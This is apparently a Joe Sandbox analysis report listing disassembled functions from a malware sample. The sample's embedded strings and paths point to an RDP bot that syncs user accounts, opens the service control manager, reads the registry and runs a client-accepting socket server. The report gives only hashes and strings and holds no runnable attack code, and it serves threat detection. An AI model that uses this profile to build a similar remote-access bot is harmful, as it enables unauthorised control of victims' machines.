                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 1286dc77dc5ff8d206b4c73fae07ba457630e6e20bbab24515aaab937f7757d7
                                                                                                                                                  • Instruction ID: 439605a239a1357b075b33eedc372639c47cc1df4772bc1f6d6864ff7e16bfdc
                                                                                                                                                  • Opcode Fuzzy Hash: 1286dc77dc5ff8d206b4c73fae07ba457630e6e20bbab24515aaab937f7757d7
                                                                                                                                                  • Instruction Fuzzy Hash: 0551F720E0C7C382FA225F1CA4A437866529F053E5F668736C76E462E1DF6DF989B301
                                                                                                                                                  Function 00007FF8B918F401 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                                                                                                                                                  • Instruction ID: 3df02d1f11550c651cfb7ddace372933f4cea60f761bd2cd95179f2619654079
                                                                                                                                                  • Opcode Fuzzy Hash: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                                                                                                                                                  • Instruction Fuzzy Hash: 97512A60A0C7C782F7215F1CA4C43782251AF153F4F760336DB6E463E2DE6DA986B282
                                                                                                                                                  Function 00007FF8BFB53B21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                                                                                                  • Instruction ID: 34251e4118015d1a3cd8e34aa02af7461437978ae0d5fac4d080070c235717f1
                                                                                                                                                  • Opcode Fuzzy Hash: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                                                                                                  • Instruction Fuzzy Hash: 45512666A0C74392FA2057DCA4E53786362AF053F5F280632C76E063E1DE6EB9A58711
                                                                                                                                                  Function 00007FF8BFB89FE1 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                                                                                                                                                  • Instruction ID: 7029d1a61f42383389ed57fb7f42d51e057ae3b48eec118ce04ae9991a799835
                                                                                                                                                  • Opcode Fuzzy Hash: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                                                                                                                                                  • Instruction Fuzzy Hash: 4B51F210A0C74792FB706BDC94C43B8A3599F857E5F644336C72E562D3EE9EA885D301
                                                                                                                                                  Function 00007FF6BE036242 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                                                                                                                                  • API String ID: 1423203057-595982613
                                                                                                                                                  • Opcode ID: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                                                                                                  • Instruction ID: 96ee7a4bf8d00ee03678c203f215bf41c92880a4e349fc34cab30f0307e787ad
                                                                                                                                                  • Opcode Fuzzy Hash: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                                                                                                  • Instruction Fuzzy Hash: 70A19F62B0968281EB30CB59F840BB96B61EB79B84F498036FF4D87695DE2DE565C300
                                                                                                                                                  Function 00007FF6BE035602 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-2022313065
                                                                                                                                                  • Opcode ID: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                                                                                                  • Instruction ID: 16fca1961dd5dd73354f34e18ce201fec5fabc6531d0c0aa31e7106c60f0f4d5
                                                                                                                                                  • Opcode Fuzzy Hash: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                                                                                                  • Instruction Fuzzy Hash: 71A15E60D0C70B81F630974CB941B7962B1AF38748F540033FB4ED6AB5EEADA9A5D702
                                                                                                                                                  Function 00007FF8BFB363CB Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
                                                                                                                                                  • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                                                                                                                                  • API String ID: 3282357527-375624272
                                                                                                                                                  • Opcode ID: e3d8a866335234c7172628d04091ce46b344c8073fa7ebe3eec0b8b2a0812a7e
                                                                                                                                                  • Instruction ID: c5913ead947c704b038ce8be45d1e6854d2b467306ee1a62ee91f893d32f88dc
                                                                                                                                                  • Opcode Fuzzy Hash: e3d8a866335234c7172628d04091ce46b344c8073fa7ebe3eec0b8b2a0812a7e
                                                                                                                                                  • Instruction Fuzzy Hash: 5E514C20E8860381FA149B9DE9117B963A2AF41BF4F154339DB3E47BD6DE3CE4459311
                                                                                                                                                  Function 00007FF8B9153C65 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                                                                                                                                                  • Instruction ID: 3a0847368ca690a1cbb1cebd95ad61e1a1bf52fa469016e148e31c5da22fb28e
                                                                                                                                                  • Opcode Fuzzy Hash: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                                                                                                                                                  • Instruction Fuzzy Hash: 91513AB6A08B82C6EB51CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                                                                                                                                                  Function 00007FF8B9153C6C Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                                                                                                                                                  • Instruction ID: 79bdf4cb8667eeb3b6299c793f2a5ee148412940fac0a96798b0615e700eaa36
                                                                                                                                                  • Opcode Fuzzy Hash: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                                                                                                                                                  • Instruction Fuzzy Hash: EF513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                                                                                                                                                  Function 00007FF8B9153C73 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                                                                                                                                                  • Instruction ID: 41532de57c3a43ad13ea21e72bebefd2e5ccda475562b428649cad0a4ac4abe3
                                                                                                                                                  • Opcode Fuzzy Hash: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                                                                                                                                                  • Instruction Fuzzy Hash: 71513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93798DF3CE849D700
                                                                                                                                                  Function 00007FF8B9153C88 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                                                                                                                                                  • Instruction ID: 6653e074592b01f497bee35a026935ab8b2fe29c32cb863a5773a88799eea484
                                                                                                                                                  • Opcode Fuzzy Hash: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                                                                                                                                                  • Instruction Fuzzy Hash: 80513BB6A08B82C6EB50CF19E45436977A1FB89B88F414136DB4D93358DF3CE849D700
                                                                                                                                                  Function 00007FF8B91849BF Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                                                                                                                                  • API String ID: 546114577-3142219161
                                                                                                                                                  • Opcode ID: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                                                                                                                                                  • Instruction ID: d1e2669f39e1dfac3790c993e58b57cdef4c05211904b549cc9ef3edb54e015d
                                                                                                                                                  • Opcode Fuzzy Hash: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                                                                                                                                                  • Instruction Fuzzy Hash: 1541EA10B0CAC3A2FB208F5CA8C03B812559F163D8F525032C75F6A2E2AE5DBD86B715
                                                                                                                                                  Function 00007FF8BFB361A0 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 104memorysleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                                                                                                                                  • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                                                  • API String ID: 610085118-1825955162
                                                                                                                                                  • Opcode ID: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                                                                                                                                                  • Instruction ID: be53372d4aab48c2a8cd2ee85bd74ee9d1f1229680f1ee49bdfd9ee54e069830
                                                                                                                                                  • Opcode Fuzzy Hash: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                                                                                                                                                  • Instruction Fuzzy Hash: 58513731A89B4382EB659B89EA50679B3A1EF84BC0F184139EB5E43B65DF3CE4459340
                                                                                                                                                  Function 00007FF6BE034688 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
